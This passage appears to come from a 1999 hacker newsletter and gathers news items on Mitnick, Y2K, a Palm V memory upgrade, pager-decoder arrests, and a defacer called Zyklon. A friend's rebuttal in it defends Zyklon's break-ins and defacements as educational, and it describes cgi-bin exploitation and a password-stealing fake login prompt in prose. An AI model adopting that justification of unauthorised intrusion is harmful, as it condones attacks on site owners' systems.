[M] I don't condone anyone causing damage in my name, or doing anything
malicious in support of my plight. There are more productive ways to help
me. As a hacker myself, I never intentionally damaged anything.
[F] How have you spent most of your time in prison?
[M] Most people here are content watching TV, playing pinochle, dominoes
and poker. I work on my defense 14 hours a day.
[F] What do you think of the restrictions placed on you when you get out
of prison as part of your plea agreement?
[M] The requirements mandating I can't touch a computer or cell or
cordless phone are akin to telling a forger not to use a pen or paper.
There is no way I can earn a living when I get out. I couldn't even work
at McDonald's. All I could do is something like gardening.
[F] What do you plan on doing when you get out of prison?
[M] "I don't know, but once I get out of here and get on with the rest of
my life, I'll never intentionally violate the law."
What do you think about Kevin Mitnick? Let us know in our forum.
-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]
@HWA
25.0 Australian stock exchange to carry out threat on Y2K slackers....
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Contributed by Spikeman
This article is located at http://newswire.com.au/9904/name.htm
<a href="http://newswire.com.au/9904/name.htm">Aussie Link</a>
06/04/99 16:45
ASX to name Y2K offenders
William Maher
The names of companies that have not disclosed the state of
their Y2K preparations will be released tomorrow morning by
the Australian Stock Exchange (ASX).
The ASX decided to carry through with the threat after it
received a poor response to its latest Y2K survey of publicly
listed Australian companies. Under a bill passed earlier this
year, those companies must reveal the state of their Y2K
compliance or face suspension by the ASX.
ASX spokesperson Gloria Peterson said that the response to
the latest survey had been "disappointing". A total of 1,148
companies were required to disclose details of their Y2K
preparations, but a significant proportion failed to meet the
March 31 deadline. "A great many companies are already
suspended for something and just thought they didn't have to
respond. But they were wrong," said Peterson.
Similarly, the Australian Securities and Investments
Commission (ASIC) is also experiencing a poor response to its
demands for Y2K details. Only half of the 700 financial brokers
and investment advisors responded to ASIC's latest survey.
ASIC spokesperson Steven Blaney said that over 3,000 firms
have now been given until mid-May to submit their details, or
face action from ASIC staff. "I think that people will realise we
are taking this issue very seriously. If they don't respond they
should expect a visit from ASIC staff," he told Newswire.
Blaney added that problems were confined to a small number
of firms which had not responded to demands for more
information. For the most part, Blaney expects firms to be on
track with preparations for 2000. "ASIC has quite a range of
powers [to deal with non-respondants], but I don't think it will
come to that," he said.
In related news, major insurers have limited their insurance
policies covering Y2K-related disasters . The Insurance Council
of Australia has said insurers are entitled to limit their policies
because potential losses due to the millennium bug are
foreseeable.
@HWA
26.0 Hacking the palm pilot V
~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/print_version/technology/story/18937.html?wnpg=all
<a href="http://www.wired.com/news/print_version/technology/story/18937.html?wnpg=all">link</a>
http://www.wired.com/news/news/technology/story/18937.html
<a href="http://www.wired.com/news/news/technology/story/18937.html">link</a>
Memory Boost for Palm V
by Leander Kahney
3:00 a.m. 3.Apr.99.PST
A Silicon Valley engineering firm is offering an 8-megabyte memory chip for
users hungry to expand the un-upgradeable Palm V.
Because of its small size, sleek look, bright screen and rechargeable
batteries, 3Com's new Palm Pilot V is selling well, despite its hefty
US$450 price tag and slim 2 MB of memory.
But thanks to the ingenuity of Palm hackers, the miniscule memory chip can
now be replaced with a whopping 8-MB module.
The procedure was first described by Japanese hacker Toshio Kashiwagi, who
posted detailed instructions on the Web, with the following warning:
"You might have to prepare yourself for breaking the machine."
Kashiwagi used a hairdryer on low power to carefully melt the unit's sealant.
After soldering a new RAM chip onto the motherboard, he super-glued
the two halves back together.
Electronic Fast Integration Group, an engineering consulting firm based in
Los Altos, California, will perform a similar upgrade for US$150. The
company is planning to offer pre-upgraded units for US$600.
"This does void the warranty from 3Com," cautioned John Warren, a partner in
the firm. "Once we modify them, 3Com won't take them back. They won't support
the customer at that point, so we have to do it."
For an extra US$40, EFIG is offering its own one-year warranty, which takes
care of everything originally covered under the 3Com warranty. Even though the
Palm V's 2MBs of memory was made to handle 5,000 addresses, 5 years of
appointments, 1,500 to-do items, 1,500 memos and 200 emails, users have been
clamoring for the upgrades. The success of the Palm has spawned a bewildering
variety of applications for Web surfing, paging, scheduling, and even street
maps and games -- all of which quickly chew up memory.
Warren said EFIG has been swamped with orders since it began offering the service
last week. But he noted that the company had ruined about six Palm V's in the
process of refining the procedure, and he cautioned inexperienced hackers from
trying it at home.
"It's a disaster normally," he said. "You have to be prepared to have a few
throwaway units."
News of the upgrade persuaded Albert Lee, a Palm nut who has owned every model of
the Pilot over the years, to buy the Palm V. "I didn't think I would have the Palm
V at all if it wasn't for EFIG's upgrade," Lee said. "Two megabytes of memory is
just a bit too tight."
Two days after buying it, Lee shipped his unit to EFIG. It was returned four days
later, and Lee wrote a glowing review.
"I think it was really exceptional work," he said. "I was a little bit worried about
how they were going to reseal the case. But the results put my doubts to rest."
"This does void the warranty," said a spokesperson for 3Com. "Our research shows that
most users don't use two megabytes of memory and would have a hard time finding a
use for eight megabytes."
Lee's review;
** Disclaimer: I have no affliation with EFIG.com -- this review is done with my
personal Palm V.
http://www.cavecreations.com/palmv8/
<a href="http://www.cavecreations.com/palmv8/">link</a>
Overview
The Palm V (formerly code-named "Razor") is Palm Computing's latest entry into the
PalmOS palmtop computer line. With this device, Palm Computing reaffirms itself as a
leader in handheld computing.
While other competing HPC WinCE devices concentrate on color, more memory, and
multimedia features, the Palm V retains the most attractive characteristic of PalmOS
devices -- simple is better. The PalmOS itself has not changed much (PalmOS 3.1)
over the years. It retains the elegant interface that allows tasks to be completed with
little learning. While HPCs are becoming more competitive, they require significantly
faster processors and more memory to perform on par with the PalmOS.
The Palm V introduces a few improvements which, while evolutionary, are well worth
the $449 price of entry. Most significant is the sleek new body design, which is slightly
smaller in length and width than previous Palm devices, but reduces thickness to an
amazing 0.4". The body is made of anodized aluminum and is easy to hold. This
design is supplemented by a new Epson display, which significantly improves contrast
and reduces reflection when compared to earlier Palm devices.
The contrast dial has been removed, in favor of a software based contrast control
activated by a button on the top of the unit. The AAA battery bay has been removed in
favor of an integrated Lithium Ion battery that promises 1 month of use under regular
conditions. The serial port and HotSync cradle have been redesigned to allow charging
of the Lithium Ion battery when the unit is resting in the cradle. The Palm V is equipped
with 2 megabytes of RAM.
Overall speed has been improved thanks to the new 16mhz Motorola DragonBall EZ
CPU. This CPU is essentially the same as previous CPUs, but with less wait states.
Additionally, the PalmOS 3.1 has been recoded and optimized for the EZ processor,
contributing to the snappy response. 16mhz does not sound very fast until it is
experienced with the PalmOS. The operating system is extremely efficient, and offers
virtually no delay.
Palm V8 by EFIG.com
While Palm V sales have been brisk, keeping prices high, die-hard Palm users had
much to complain about the Palm V. While they loved the new industrial design, and
raved about the changes throughout the Palm V, nobody was really that excited about
the 2 mb of RAM in the unit -- especially since the unit is sealed and non-upgradeable.
Leave it to the netizens to figure out how to open the case and upgrade the Palm V to
an amazing 8 megabytes of memory! The first prototype came out of Japan thanks to
Toshio Kashiwagi. This page, was later translated into English by John Lagerling. It
caused quite a stir. Toshio had successfully unsealed the Palm V without damage,
and upgraded the memory to 8 mb using a few tools and a new memory chip.
Suddenly, the Palm V became a lot more appealing. People everywhere wanted the 8
meg Palm V, but clearly not many people had the skill or the equipment to do the
upgrade themselves.
John Figueroa of EFIG.com now offers what everyone has been asking for -- a Palm V
upgrade service. Mr. Figueroa will upgrade your Palm V to 8 megabytes for the
surprising low cost of $150.00 USD. Additionally, he plans to sell Palm V units
pre-installed with 8 megs of memory for $600.00 USD.
Skeptical? Interested but afraid to ship your $400+ unit to EFIG.com for an upgrade?
Well... I'm going to take the chance and find out for everyone! Let's find out a little bit
more about me and my unit.
Why I Waited
I have every single Palm Computing device since the very first "Pilot", which had no
backlight! A lot has changed since then, and as every Palm upgrade has come out, I
could always justify the upgrade. My Palm III went with me everywhere I went, and I
relied on it to keep my life organized. I have owned Newtons, many HPs
(100LX,200LX,300LX WinCE), as well as several odd palmtops (anybody still remember
the Poqet computer?). The Palm Computing line of handheld computers were the first
ones that didn't end up in the nightstand. Size, weight and simplicity was what
continued to sell me.
When the Palm V came out, I was first in line for one -- until I realized there was no
memory increase from my existing Palm III. Following the history of all my Palm
devices, memory has always doubled. The Pilot 5000 had 512k, the PalmPilot
Professional had 1 mb, and the Palm III had 2 mb. While I never really filled up the
memory of the 2 mb model, I hesitated buying a Palm V because it was
non-upgradeable -- if it ever came to the point where I needed more than 2 mb of
memory, I was stuck buying a new unit. In the end, there really is no incentive for me
to spend $400+ to get a unit with the same amount of memory as my Palm III.
Preparing for the Palm V8
When John Figueroa of EFIG.com offered his upgrade service for the Palm V, I decided
it was time to get the Palm V. The elegant design, and a realized 8 mb of memory
would make this device perfect for my needs. While Mr. Figueroa's business seemed
to be legitimate, I was still a little skeptical. The fit and finish of the Palm V is
exceptional -- letting someone crack open such a tightly sealed device is enough to
make anyone nervous. Things I've taken apart never end up looking the same, or
working as well.
But someone always has the be first to try new things. Let's take a look at my Palm V,
which I purchased brand new from Staples on March 17, 1999.
Full View
(follow link for story and images)
Top View
(follow link)
Bottom View
(follow link)
Side View
These images represent a view of the Palm V from 4 sides. You'll notice that the unit is
extremely thin, with a very fine seam (only really visible from the top and bottom views).
The Upgrade
The entire upgrade process, from shipping to receiving, should take 4 days. Since I
shipped on a Thursday, and John is still ramping up for production, it will take slightly
longer. His overall policy is "In by Monday - ships on Thursday".
Thursday, March 18, 1999
John Figueroa gives the go-ahead to ship my Palm V. I back up my entire Palm V
using BackupBuddy NG, and perform a hard reset. The Palm V hard reset is tricky...
hold down the power button, press and hold in the reset hole for at least 2 seconds,
release the reset hole, then release the power button (in that order). Hit Scroll Up to
erase the memory. I HIGHLY RECOMMEND you use BackupBuddy, even if you never
upgrade your Palm. Losing data is never fun.
I stop by Federal Express station in King of Prussia, PA at around 6:30p. I shipped my
Palm V via FedEx Priority Overnight ($24), and is guaranteed to be at EFIG by 10:30a.
Remember to have EFIG.com's phone number (408-739-8002) when you ship -- the
FedEx form has a space for it.
Friday, March 19, 1999
Spent the morning on the FedEx website tracking the package. Got a little impatient
until I realized that there was a 3 hour time difference. :) My Palm V arrived at
EFIG.com at 9:32a Pacific. The Tracking was as follows:
Delivered To : Recept/Frnt desk
Delivery Location : SUNNYVALE CA
Delivery Date : 03/19
Delivery Time : 09:32
Signed For By : T.MAIDEN
Status Exception : Payment Received
Scan Activity :
Delivered SUNNYVALE CA 03/19 09:32
Placed on Van SUNNYVALE CA 03/19 08:42
Arrived at FedEx Destination Location SUNNYVALE CA 03/19 08:39
Left FedEx Sort Facility OAKLAND CA 03/19 04:50
Left FedEx Origin Location KING OF PRUSSIA PA 03/18 19:49
Pickup Exception KING OF PRUSSIA PA 03/18 18:29
It's in John's hands now! John has notified me "We will upgrade it with the first batch of
the week".
Monday, March 22, 1999
John writes me a brief email to confirm my shipping address so that he can pre-print
labels. Things still look on schedule to receive my unit back toward week's end.
Tuesday, March 23, 1999
John has emailed me with the following information:
"Your unit has been sealed and is getting our first serial number prototype today at
11am (my note here: 2:00p Eastern), should ship today too.".
John emails me to let me know the FedEx tracking number for my package. It's
guaranteed by 10:30a Wednesday.
Getting The Unit Back
Wednesday, March 24, 1999
Today is the big day!!! Here's the FedEx tracking information as my Palm V traveled
back from Sunnyvale, CA:
Delivered To : Recipient
Delivery Location : WAYNE PA
Delivery Date : 03/24
Delivery Time : 09:54
Signed For By : A.MCGUIRE
Status Exception :
Scan Activity :
Delivered KING OF PRUSSIA PA 03/24 09:54
Placed on Van KING OF PRUSSIA PA 03/24 08:27
Left FedEx Sort Facility MEMPHIS TN 03/24 04:12
Left FedEx Sort Facility MEMPHIS TN 03/24 02:35
Left FedEx Origin Location SUNNYVALE CA 03/23 17:10
Picked up SUNNYVALE CA 03/23 17:07
My girlfriend calls at 9:55a -- THE PALM V IS BACK! Took an early break, and drove
home.
Looks like the unit was packaged extremely well. It was boxed, and wrapped tightly in
bubble wrap. The actual unit is in a static safe bag.
The unit turns on easily, and the power indicator seems to be down just a little. I
HotSync and BackupBuddy restores my databases, and my software to pre-shipping
condition (1.5 mb takes about 10-15 minutes to reload). The power indicator reads 3.96
volts (4.07 is fully charged on my unit). It's nice to see ALL THAT MEMORY in my
Palm V. The bottom gap (as mentioned in two other reviews) is minor, but there. If I
didn't know better, I wouldn't be able to tell. There are no pry marks or scars on the
unit.
Initial verdict: The workmanship is exceptional. 8mb is great. Happy to have my unit
back!
A Closer Look After the Upgrade
If you're really concerned with how the case looks after the upgrade, you don't need to
worry that much. There IS a wider gap in the seam, but the case doesn't budge if I try
to pull it apart, or push the seams together. It isn't that noticeable unless you put two
units side-by-side (see The Gadgeteer review). It still fits in the Hotsync cradle -- if the
gap was bad enough, it wouldn't fit.
Honestly, I don't know what I'm doing with 8 mb of memory. :) I've always gotten by in
the 2 megs of space in the Palm III. The best thing to do is go ahead and install a
bunch of programs.
I hopped online and purchased the AccessGuide to NYC ($14.95) and Quo Vadis
mapping software by Marcosoft ($64.95). AccessGuide is approximately 230k, and
Quo Vadis is about 90k for the main program, plus all the maps you want (I went
ahead and got 2 megs worth of maps for the regions I'm in the most (Philadelphia,
Boston and New York City). Additionally I downloaded a bunch of DOC files.
As you can see, I still can't seem to fill it up. I guess I should be pretty happy! Even if I
tried, I bet I couldn't get more than 5 megs of software into the Palm before I run out of
things I want to put on it.
Performance
I topped off the battery, and started playing. So far, I haven't noticed any performance
difference, or battery difference. Obviously, I've only had it back for a few hours so I'll
update with long-term effects as I go along.
Conclusion
It's only been a few hours, but first and foremost, for $150.00 USD, this is the
cheapest, and best way to get 8 megs into your Palm V without attempting to do the
upgrade yourself. Mr. Figueroa has definitely demonstrated his ability to open and
upgrade the Palm V without damaging the unit. The unit is sturdy, and feels brand new.
My Palm V was only 2 days old prior to shipping to EFIG.com, so it's good to know
my unit is still in one piece!
EFIG.com kept an open line of communication with me throughout the upgrade
progress. This was especially comforting since they were ramping up for mass
upgrades -- during even the busiest times, John took a minute to keep me posted.
I HIGHLY and WHOLEHEARTEDLY recommend the EFIG.com upgrade. There is no
reason to worry. This one is for real!
Battery Life
Of all the emails I am getting, 95% of them have asked me, "how has battery life been
affected?". Well, it's really hard to say at this point. Other than the fact the unit only
came back recently, the biggest thing is everytime you HotSync, you charge the
battery (something you should do everyday, anyway). Every night, if you leave it in the
charger, it tops off your battery.
In my case, I just add it to my regular evening routine... drop the StarTAC into the
charging cradle, plug the Thinkpad into the charger, drop the Clik! drive into the
charging cradle, and now drop the Palm V into the cradle.
So what if you're away on vacation? Well, I guess you could bring your cradle (it's
really NOT that big a deal), or buy the travel kit. So enough preaching... you still want
to know how long the Palm V with 8 megs will last.
Battery Life Study
EFIG Engineering presented their battery life study, and displays the following
statistics:
(follow link to see chart)
As you can see from EFIG.com, while the unit is off, battery drain is more severe vs.
the stock Palm V. However, battery life is improved while the unit is on and idle.
Now you've seen their estimates, let's do a real life test. I went ahead and switched my
Palm V to do an infrared HotSync. This will enable me to be completely without cradle.
I screwed up royally, so my last experiment needs to be ditched. On March 30, I will
charge up to a full 4.02V and we will document a day-by-day account of battery life
without charging.
I will HotSync twice a day via IR, and continue to use my unit like I normally do every
day (looking up phone records, entering appointments, regular alarms, PocketQuicken,
tinkering with applications, etc.)
It's not in a controlled environment, so your results will vary from mine. However, I think
it will be fairly representative of what typical use will yield with a Palm V upgraded to 8
mb while AWAY from the cradle -- again, if you HotSync with the cradle, you are
recharging and the study is useless to you because your battery will keep topping off.
(follow link to see chart)
Why not to do the upgrade yourself: http://palmvadventures.webjump.com/
<a href="http://palmvadventures.webjump.com/">PalmVadventures</a>
(n.b It seems the instructions to perform the upgrade have been pulled from the web
if anyone has a link to an english page with the procedure listed please email me
tnx .. - Ed )
@HWA
27.0 MDT software mentioned in last issue warrants arrests
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN
<a href="www.hackernews.com">www.hackernews.com</a>
contributed to HNN by Silicosis
There's some weird shit going down with decoding radio
data signals. After the arrest of Bill Cheeks by the
Secret Service yesterday many people are very nervous
as to what will come next. Both WinFlex & PocFlex,
windows/dos pocsag/flex/golay decoders have pulled
the software as both developers feel as if they're going
to be under serious legal fire from Motorola. WinMDT
also pulled it's software, most likely due to the recent
busts. Interesting that Motorola developed and owns
the patent on both flex/reflex and mdc4800 (mdt).
Here is a mirror of the latest version of some of the MDT
decoding software. You better grab it now before it too
disappears.
SCANNER TX/RX DECODE SOFTWARE ETC.
http://www.kmed70.freeserve.co.uk/kmed70/software.htm
<a href="http://www.kmed70.freeserve.co.uk/kmed70/software.htm">Link</a>
With the rush to press we missed this link yesterday but
here is Bill Cheeks web site. Lots of good info there that
may disappear soon.
Scannist Extraordinaire
http://www.comtronics.net
<a href="http://www.comtronics.net">Link</a>
@HWA
28.0 Hot on the trail of Zyklon? BUSTED!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 3rd via HNN, The Toronto Star;
<img src="http://www.cybersurferz.com/zyk-star.jpg">Article scan w/picture</a>
http://www2.thestar.com/thestar/back_issues/ED19990403/news/990403NEW04_FO-HACKER3.html
<a href="http://www2.thestar.com/thestar/back_issues/ED19990403/news/990403NEW04_FO-HACKER3.html">Link</a>
Hack attack: My search for Zyklon
He infiltrated my Web site; I tracked him to his lair
By John Howell
Special to The Star
My battle with the Nazi-inspired hacker Zyklon began on a
ordinary Monday last March.
At the time, I was computer network supervisor for a large
Toronto company. I received a call from a fellow employee, who
told me he thought the company Web site ``looked strange.''
I called up the site on my notebook computer, and what I saw
stopped me in my tracks. Scrawled across the corporate Web
page, something which is potentially viewed by tens of
thousands of people, was the declaration:
``THIS SITE IS 0WN3D BY ZYKLON!'' My site had been
``hacked,'' vandalized by an electronic thug.
He was very proud of what he'd done. He had named himself for
Zyklon-B, the gas used by the Nazis to exterminate Jews in the
concentration camps of World War II. He wrote ``OWN3D''
instead of ``OWNED'' to imitate the lingo favoured by gangsta
rappers.
I contacted our site's Webmaster and together we replaced the
vandalized Web page. But the implications of what Zyklon had
done were much more serious.
The feeling of having been violated would not go away. I
decided to track Zyklon to his lair.
I am a computer geek. I spend my whole day working on large
computer networks. I design, optimize and troubleshoot them. I
love the way computers work and when they don't it's even
more fun to psychoanalyze them.
And I've been following hacking techniques since I started
computing in the early 1980s.
A hacker exploits weaknesses within computer systems to
access, modify or destroy the information of the computer. In
most cases hackers will embarrass a company by changing its
Web page into a pornography page. The more sophisticated
hacker will access a computer and never let anyone know. He -
and it's almost always a ``he'' - just sits and watches and learns,
plotting destruction.
Let's get this straight: Hackers
are criminals, and smug ones
at that
Let's get this straight: Hackers are criminals, and smug ones at
that. To hackers, only their immediate team of hacker friends are
``elite.'' They hold all other users of the Internet in complete
contempt, calling them ``lamers.''
On the Internet you are never completely safe. It's like being an
excellent driver. No matter how good a driver you are, another
driver can always crash into you. The vast majority of hackers
these days are copycats following from recipe books of hacks,
known as ``exploits.''
There are literally thousands of exploits a hacker can do, making
it pitifully easy to destroy or disable a computer system.
After we fixed the damage to our Web site and closed the
access that Zyklon had used to change it, I got busy finding
out about him.
I began by making many, many searches on my favourite Web
search sites, Yahoo! and AltaVista. I typed in search terms
``Zyklon,'' ``0wn3d,`` ``hack'' and other words, scouring the
Internet for other examples of Zyklon's destruction.
He had been a very busy vandal. My searches showed he had
hacked hundreds of Web sites in Canada, the U.S. and around
the world, targeting such major government operations as
NATO, the United States Information Agency and the 21st
Century U.S. Government site, which is dedicated to
``transforming governments in the 21st Century.''
The targets varied from small interest groups to big government
agencies. In some cases home pages had been changed to
porn. In others Zyklon had created a greeting card to his hacker
associates and in still others he had caused their Web page to
be ``mirrored'' - electronically linked - to an anarchy site in
Sweden.
I learned that a certain U.S. state's Web site was so open,
anyone who knew this could send out press releases posing as
the state governor.
A knowledgeable and determined hacker can access a Web
server completely through a Web browser, the navigation
program used to surf the Net. This ``exploit'' uses a back door (a
login that bypasses security) to give access to the Web site's
main computer server.
Changing the company's site is as simple as typing in a single
short command such as ``This site is 0wn3d by Zyklon'' to a
Web page from the Web browser.
A common attack is to create a program that will send the
hacker your password then delete itself. It does its work by
asking you to enter your password, just as you would do
everyday.
The way this would look is that the computer would say:
``Login,'' a prompt most computer users see on their screen at
least once a day.
You would then type in your computer access name, receiving
back the message ``Incorrect Password.'' You would then retype
your password, thinking you'd made a mistake the first time.
What you would really have done is fed your password and
login name to a hacker.
I noticed that on some of the sites Zyklon had hacked there was
mention of what looked to be a chat group, a place where
computer users congregate online to gab, via a system called
Internet Relay Chat (IRC).
The tip-off was the electronic signature ``#pascal.'' It meant the
chat group's name was ``Pascal,'' named after a computer
programming language developed in the 1970s.
I did a search of some common IRC groups - also called
channels - and not only found Pascal, I also found Zyklon. He
was the owner of the channel.
When I entered his realm I was immediately tagged as coming
from a site that he had hacked. My nickname that I had given
myself for the chat was ``Roadkill'' - which I figured was
appropriate, seeing as how Zyklon had tried to run me over.
An automatic look-up called a ``bot'' - short for robot - told
Zyklon who I was. It was the equivalent of walking through a
metal detector.
``Heh, heh,'' he chortled, as I entered the chat group.
Zyklon started bragging to his Pascal cronies about the
information he had stolen from me.
``The Webmaster's password (at my company) is: ``getout! Ha,
ha.''
I didn't rise to Zyklon's bait. I held back - ``lurking,'' as it's called
- to see if Zyklon would further implicate himself.
``You got in?'' said another Pascal member, identified as
``Crystalin.''
``Getout!'' he said, repeating my password. ``Laugh out loud!
Someone's getting sick of me.''
``Heh, heh,'' Crystalin chortled. ``What, did they see you?''
``No, usually not,'' Zyklon replied. ``But they know when
someone is there working their magic.''
``You think Roadkill is snooping on us?'' Zyklon asked. ``Cause
he found my eggy? (short for ``egg drop,'' another term for a
hack attack). Or do you think he's just got a (corporate) address
for no reason? Heh, heh.''
Zyklon turned to another Pascal member, named ``Fluxx.''
``Fluxxy!'' he said. ``I think someone's trying to find me!''
I had just done my own look-up on him. Zyklon knew it, but I
got the information I was looking for. I could see where he was
logging in from.
This told me what his Internet service provider was and the ID
he was logged in as. This was telling exactly where he was on
the Internet, although at this point I still didn't know his real
name, or what city he was living in.
``Hey Roadkill,'' Zyklon said, addressing me directly. ``Go to
your Web site.'' He wanted me to run a particular network utility
that would look up his Internet address.
I remained silent and waiting.
``Oh wait! I deleted it!'' Zyklon crowed, taunting me.
He went on to admit that he had hacked my site.
``We just hack (he named my company again) all day, that's
what we do. . . .''
Zyklon was crowing, but the victory was mine. I had located
him and got him to admit his crime.
I now had enough information to take this into a legal setting. I
talked to a lawyer. The lawyer contacted the FBI computer
crimes department. Unfortunately, after an initial interest, no
one at the FBI seemed too interested. This lack of interest
frustrated me.
Victory was mine. I had
located him and got him to
admit his crime
I even had trouble convincing people that they'd been hacked
by Zyklon. Unless they could see the damage he'd actually
done, they wouldn't believe me. One site operator wouldn't
believe me until I read him his password file over the phone.
I knew I had everything to nail Zyklon. I had the times and
Internet location and address for him. By October, I had his real
name and age. He was then 17 years old and living in the
western United States.
But there it lay for about three months.
Early this year a close friend of mine contacted me and let me
know that he was talking with an associate who had told him
that his company had been hacked. Out of curiosity, he asked
for the hacker's name.
When he heard the name Zyklon bells went off. My friend
remembered all the stories I had told him about my search.
I sent my friend's contact an e-mail file with all the data I had on
Zyklon. I did this in the hope it would finally stop him.
Since I'd last checked on him, Zyklon had been busily hacking
in Toronto, Florida, Japan, Los Angeles and many other cities
and countries.
My friend's friend discovered that a company in Florida was
being hacked and sent them an e-mail warning them.
Unfortunately, the Florida company was just trying to find out
why their computers had crashed. He got a call back within
hours. The FBI had been called in.
They set up a trace on the company's Internet access and
monitored all the Internet sessions. Zyklon was not quite
finished with the site in Florida, but he soon would be.
The FBI captured the full hacking session and Zyklon's Internet
address, his electronic fingerprints.
Last week, they moved in and arrested Zyklon. He is now being
charged with computer crime offences. U.S. federal law allows
every state a hacker passed through on the Internet to press
charges.
His computer equipment has been taken away. And apparently,
his parents are really upset.
Justice may be delayed, but when it comes it can be so sweet.
John Howell is a computer systems expert.
28.1 Rebuttal by Fluxx;
~~~~~~~~~~~~~~~~~~
"The Untold Truth About Zyklon, The Security Specialist Trying To Make A Difference."
Before I begin, let me introduce myself. I go by the name Fluxx.
This article is a follow up to the article written by John Howell
published on April 3rd.
Clarification being the primary objective. The previous article
contained a lot of what I like to call FUD (Fear, Uncertainty & Doubt)
which usually comes from people lacking the proper information and/or
knowledge.
I have known "Zyklon" for 3 years now, and we are close friends.
It sickens me to see some of the vicious slander that Mr. Howell spews
out without knowing this to actually be fact. First of all, Zyklon was
an alias he picked out a few years ago because it was catchy, not
because he is some Nazi, like Mr. Howell describes him to be.
Secondly, his goal is to educate network security administrators of
the flaws that their servers are vulnerable to. As Mr. Howell so cleverly
pointed out, it's hard to convince a company that they have been breached
without them actually seeing the damage. What better way to prove it to
a large company, other than to modify their corporate webpage? Sure, it
still is illegal entry to computer systems, and some could also say
damaging data, but that remains to be seen. I have seen countless system
penetrations from Zyklon in the past, and he has always backed up their
original html files, and patched their security vulnerabilities, another
good point Mr. Howell declined to add. What I would also like to know is,
why Mr. Howell is so proud of himself having "caught" Zyklon owning up to
his "crimes" on IRC. Does he think IRC logs will stand up in court? I'm
sorry to say my friend, they won't.
There are many different kinds of hackers out there. Political
Activist hackers who do it for a cause. Malicious hackers who do it
to cause as much damage as they can, most commonly younger kids on a joy
ride. Finally, you've got the average hacker who's curiosity gets the
best of him, and all he strives for is to learn, secure and move on.
Getting inside of a hackers head is a ride not many have the chance to
take. Most commonly refered to as Generation-X techno kids, hackers are
not always kids. I personally know hackers who are grandfathers. It has
become a lifestyle in the 90's, and the world has finally come to realize
that.
As technology progresses faster and faster every day towards the year
2000, Internet and corporate network security tightens up ever so slowly.
In most cases, that's thanks to people like Zyklon. The world wide web has
become a huge medium for companies, and business is good. Customers
appreciate stable tight security for their sites, they do not expect to
pop up their webpage one Sunday morning and have happy faces all over it.
Essentially, breaking down server security now, is the most efficient way
in making people more aware of the rising threat. Classically, most
webservers run or have access to some sort of cgi-bin directory, which
contains many programs available to the advanced browsing user to issue
remote commands to the internal server, to retrieve issued requests. Now
for normal folk, they would never see these. They would have no need to
see them, but for a hacker its the peephole staring directly into the soul
of the machine. Mr. Howell also mentioned this, describing it as
"a back door (a login that bypasses security) to give access to the Web
site's main computer server". This is not entirely true. What occurs is
the WWW server software has access levels it needs to fulfill to run one of
the cgi-bin programs. A website that is on-line with one of the many
vulnerable cgi-bin programs is now open to be exploited. This cgi-bin may
be used to issue commands to the computer, remotely (not from the keyboard)
to the operating system. A hackers light at the end of the tunnel,
metaphorically speaking. Don't get me wrong, this isn't the only way
hackers exploit systems. This is one (quite old technique) that STILL is
vulnerable on thousands of machines spanning across the world.
In the end, hackers will always be here, and like life has shown us, there
are always good and bad points to every argument. Let us sit, and idly
ponder why such brilliant computer specialists are not working for these
large corporatations. Kinda makes you wonder what the current security
administrators are doing, eh?
Fluxx
Born & Raised In Canada.
@HWA
29.0 Atlanta based ISS seeks to hire hackers from Aussie land..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scoped via HNN
http://www.it.fairfax.com.au/990406/networking/networking1.html
<a href="http://www.it.fairfax.com.au/990406/networking/networking1.html">Link</a>
The good, the bad, and the hackers
By PHILIPPA YELLAND |
LOOK! Up on the Internet. Is it the X Files? Is it Star Wars?
Is it Ghostbusters? No, it's the X-Force. This
offshoot of Internet Security Systems is looking to
hire a good hacker (yes, there are such beings) to
join its worldwide team dedicated to truth, justice,
and uncovering new security risks.
There's a thin line of bits and
bytes between the good and
the bad hackers, ISS's local
managing director Steven
Laskowski says.
Some, like Star Wars' Darth
Vader, choose to go over to the dark side and use
their powers to bring down governments,
multinationals, and corporations. Others, like Luke
Skywalker, use their abilities in the service of ISS to
warn subscribers of threats to their operating
systems, applications and networks.
Laskowski is searching for a very rare kind of
person to join the elite band of hacker-busters. She
or he must be ethical, endlessly patient, be very
knowledgeable about systems and applications,
understand computer architecture, and have been
hacking for many years.
``We're looking for someone who can keep their
finger on the pulse of the underground hacking
community, yet who can look at applications to find
their vulnerabilities,'' Laskowski says.
ISS says that applications, particularly from
Microsoft, are the new favorite for hackers. ``Bill
Gates is targetted particularly because he's the
antithesis of the hacker mentality,'' Laskowski says.
When Laskowski finds a suitable local Jedi, she or
he won't have to worry about splashing out on
corporate suits and high heels. ``In our head office
at Atlanta, X-Force team members' workmates
include two snakes, one iguana, and three spiders,''
Laskowski says.
ISS is already sending out warnings to corporate
subscribers that solutions to the Y2K problem may
become security issues themselves. ``Businesses
are locking down apps so they're Y2K-compliant
and this means there can be no patches. This is a
hackers' bonanza.
``Second, Y2K is an industrial espionage minefield.
Hackers are waiting until after 1 January 2000 to
break in, knowing that the blame will be directed at
the Y2K solution, not the hacker."
Australia is increasingly important in The Empire.
ISS's 25-year-old founder, Chris Klaus, is paying a
physical - as opposed to a virtual - visit next month,
and the X-Force's chief sweat shirt, Christopher
Rouland, is beaming over in June.
Steven Laskowski can be reached on
slaskowski@iss.net
@HWA
30.0 More on hacktivism from the Globe...
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<a href="http://www.Boston.com/dailyglobe2/093/nation/Electronic_infiltration_is_burgeoning_war_zone_of_hackers_worldwide+.shtml">Link</a>
Electronic infiltration is burgeoning war
zone of hackers worldwide
By Patti Hartigan, Globe Staff, 04/03/99
B eavis and Butt-head, the cackling cartoon characters, stare out from a
NASA Web page, their fists raised in a sort of virtual protest. These
familiar figures from American popular culture are hardly the new image of
the space agency: The site was ''hacked,'' or corrupted, yesterday by a
group of Russian computer experts who posted the same message on a
NATO Web site in Egypt. The hacked sites, signed ''From Russia With
Love,'' are scrawled with a profane message denouncing NATO as well as a
demand for allied troops to ''Go away from Kosovo.''
While the real war in the Balkans is waged on the ground and in the air, a
